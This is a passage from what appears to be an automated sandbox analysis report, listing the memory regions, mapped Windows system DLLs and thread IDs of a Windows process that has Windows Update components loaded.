= 0x7fefd570000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 916 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 917 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 918 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 919 start_va = 0x7fefe630000 end_va = 0x7fefe806fff entry_point = 0x7fefe630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 920 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 921 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 922 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 923 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 924 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 925 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 926 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 927 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 928 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 929 start_va = 0x7feff2a0000 end_va = 0x7feff2f1fff entry_point = 0x7feff2a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 930 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 931 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 932 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 933 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 934 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 935 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 936 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 937 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 938 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 939 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 940 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 941 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 942 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 943 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 944 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 945 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 946 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 947 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 948 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 949 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 950 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 951 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 952 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 953 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 954 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 955 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 956 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 957 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 958 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 959 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 960 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 961 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 962 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 963 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 964 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 965 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 966 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 967 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 968 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 969 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 970 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 971 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 972 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 973 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 974 start_va = 0x2bb0000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 975 start_va = 0x32b0000 end_va = 0x336ffff entry_point = 0x32b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 976 start_va = 0x3c90000 end_va = 0x3d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 977 start_va = 0x4160000 end_va = 0x4260fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 978 start_va = 0x4440000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 979 start_va = 0x46a0000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 980 start_va = 0x7fefc660000 end_va = 0x7fefc6b6fff entry_point = 0x7fefc660000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 981 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 982 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 983 start_va = 0xe70000 end_va = 0xe71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 984 start_va = 0x7fefca40000 end_va = 0x7fefca61fff entry_point = 0x7fefca40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 985 start_va = 0x7fefca70000 end_va = 0x7fefcabdfff entry_point = 0x7fefca70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 986 start_va = 0x7fefc510000 end_va = 0x7fefc55bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 987 start_va = 0x37c0000 end_va = 0x383ffff entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 988 start_va = 0x7fef8b10000 end_va = 0x7fef8b27fff entry_point = 0x7fef8b10000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 989 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1007 start_va = 0xe80000 end_va = 0xe80fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1008 start_va = 0x2af0000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1009 start_va = 0x2e90000 end_va = 0x2f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 1010 start_va = 0x38c0000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 1011 start_va = 0x39f0000 end_va = 0x3a6ffff entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 1012 start_va = 0x4540000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 1013 start_va = 0x4720000 end_va = 0x491ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1014 start_va = 0x4960000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1015 start_va = 0x4a20000 end_va = 0x4a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 1016 start_va = 0x4b00000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1017 start_va = 0x4c00000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1018 start_va = 0x4d10000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 1019 start_va = 0x4e50000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 1020 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 1021 start_va = 0x50b0000 end_va = 0x512ffff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 1022 start_va = 0x5190000 end_va = 0x520ffff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1023 start_va = 0x7fef5040000 end_va = 0x7fef5055fff entry_point = 0x7fef5040000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1024 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 1025 start_va = 0x7fffff50000 end_va = 0x7fffff51fff entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 1026 start_va = 0x7fffff52000 end_va = 0x7fffff53fff entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1027 start_va = 0x7fffff54000 end_va = 0x7fffff55fff entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1028 start_va = 0x7fffff56000 end_va = 0x7fffff57fff entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 1029 start_va = 0x7fffff58000 end_va = 0x7fffff59fff entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1030 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1031 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1032 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1033 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 1034 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1035 start_va = 0x2bc0000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1036 start_va = 0x3a70000 end_va = 0x3aeffff entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 1037 start_va = 0x3fe0000 end_va = 0x405ffff entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1038 start_va = 0x4660000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 1039 start_va = 0x49e0000 end_va = 0x4a5ffff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1040 start_va = 0x4da0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 1041 start_va = 0x4fe0000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 1042 start_va = 0x7fee22c0000 end_va = 0x7fee2512fff entry_point = 0x7fee22c0000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1043 start_va = 0x7fee2900000 end_va = 0x7fee2b79fff entry_point = 0x7fee2900000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1044 start_va = 0x7fef4cf0000 end_va = 0x7fef4d60fff entry_point = 0x7fef4cf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1045 start_va = 0x7fef5030000 end_va = 0x7fef503efff entry_point = 0x7fef5030000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1046 start_va = 0x7fefa070000 end_va = 0x7fefa08afff entry_point = 0x7fefa070000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1047 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 1048 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 1049 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1050 start_va = 0x4a60000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 1051 start_va = 0x4d20000 end_va = 0x4d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 1052 start_va = 0x77260000 end_va = 0x77266fff entry_point = 0x77260000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1053 start_va = 0x7fefca20000 end_va = 0x7fefca27fff entry_point = 0x7fefca20000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1054 start_va = 0x7fef4390000 end_va = 0x7fef439cfff entry_point = 0x7fef4390000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1727 start_va = 0xe70000 end_va = 0xe70fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 1728 start_va = 0xe90000 end_va = 0xea9fff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 1729 start_va = 0xeb0000 end_va = 0xeb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 1730 start_va = 0xf40000 end_va = 0xf47fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1731 start_va = 0xf50000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1732 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1733 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 1734 start_va = 0x1450000 end_va = 0x1450fff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 1735 start_va = 0x1560000 end_va = 0x1561fff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 1736 start_va = 0x1570000 end_va = 0x1570fff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 1737 start_va = 0x1580000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1738 start_va = 0x1590000 end_va = 0x1597fff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 1739 start_va = 0x1620000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 1740 start_va = 0x1630000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1741 start_va = 0x1640000 end_va = 0x164ffff entry_point = 0x1640000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1742 start_va = 0x1760000 end_va = 0x176ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001760000" filename = "" Region: id = 1743 start_va = 0x1770000 end_va = 0x177ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001770000" filename = "" Region: id = 1744 start_va = 0x1780000 end_va = 0x178ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001780000" filename = "" Region: id = 1745 start_va = 0x1790000 end_va = 0x179ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001790000" filename = "" Region: id = 1746 start_va = 0x17a0000 end_va = 0x17affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017a0000" filename = "" Region: id = 1747 start_va = 0x17b0000 end_va = 0x17bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017b0000" filename = "" Region: id = 1748 start_va = 0x17c0000 end_va = 0x17cffff entry_point = 0x17c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1749 start_va = 0x1850000 end_va = 0x185ffff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 1750 start_va = 0x1860000 end_va = 0x1867fff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 1751 start_va = 0x1870000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1752 start_va = 0x1880000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 1753 start_va = 0x1890000 end_va = 0x1897fff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 1754 start_va = 0x1920000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001920000" filename = "" Region: id = 1755 start_va = 0x1930000 end_va = 0x193ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 1756 start_va = 0x1940000 end_va = 0x194ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001940000" filename = "" Region: id = 1757 start_va = 0x1950000 end_va = 0x195ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001950000" filename = "" Region: id = 1758 start_va = 0x1960000 end_va = 0x196ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001960000" filename = "" Region: id = 1759 start_va = 0x1970000 end_va = 0x197ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001970000" filename = "" Region: id = 1760 start_va = 0x1a00000 end_va = 0x1a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1761 start_va = 0x2840000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1762 start_va = 0x29e0000 end_va = 0x2a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 1763 start_va = 0x2a20000 end_va = 0x2a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 1764 start_va = 0x4b60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 1765 start_va = 0x4e50000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 1766 start_va = 0x5060000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1767 start_va = 0x5210000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1768 start_va = 0x5310000 end_va = 0x540ffff entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 1769 start_va = 0x5410000 end_va = 0x550ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005410000" filename = "" Region: id = 1770 start_va = 0x5510000 end_va = 0x560ffff entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 1771 start_va = 0x5610000 end_va = 0x660ffff entry_point = 0x0 region_type = private name = "private_0x0000000005610000" filename = "" Region: id = 1772 start_va = 0x6610000 end_va = 0x1660ffff entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 1773 start_va = 0x16610000 end_va = 0x16a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000016610000" filename = "" Region: id = 1774 start_va = 0x7fee2ed0000 end_va = 0x7fee30a3fff entry_point = 0x7fee2ed0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1775 start_va = 0x7fffff58000 end_va = 0x7fffff59fff entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1776 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1777 start_va = 0xdd0000 end_va = 0xdd0fff entry_point = 0xdd0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1778 start_va = 0xde0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 1779 start_va = 0x1c60000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 1780 start_va = 0x2be0000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 1781 start_va = 0x4180000 end_va = 0x41fffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 1782 start_va = 0x16a10000 end_va = 0x16e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000016a10000" filename = "" Region: id = 1783 start_va = 0x7fef4470000 end_va = 0x7fef44ebfff entry_point = 0x7fef4470000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Thread: id = 28 os_tid = 0xad0 Thread: id = 29 os_tid = 0xaac Thread: id = 30 os_tid = 0xaa8 Thread: id = 31 os_tid = 0x498 Thread: id = 32 os_tid = 0x73c Thread: id = 33 os_tid = 0x4d4 Thread: id = 34 os_tid = 0x448 Thread: id = 35 os_tid = 0x46c Thread: id = 36 os_tid = 0x450 Thread: id = 37 os_tid = 0x7ec Thread: id = 38 os_tid = 0x7e0 Thread: id = 39 os_tid = 0x7b0 Thread: id = 40 os_tid = 0x690 Thread: id = 41 os_tid = 0x680 Thread: id = 42 os_tid = 0x668 Thread: id = 43 os_tid = 0x654 Thread: id = 44 os_tid = 0x650 Thread: id = 45 os_tid = 0x648 Thread: id = 46 os_tid = 0x63c Thread: id = 47 os_tid = 0x638 Thread: id = 48 os_tid = 0x630 Thread: id = 49 os_tid = 0x628 Thread: id = 50 os_tid = 0x610 Thread: id = 51 os_tid = 0x478 Thread: id = 52 os_tid = 0x43c Thread: id 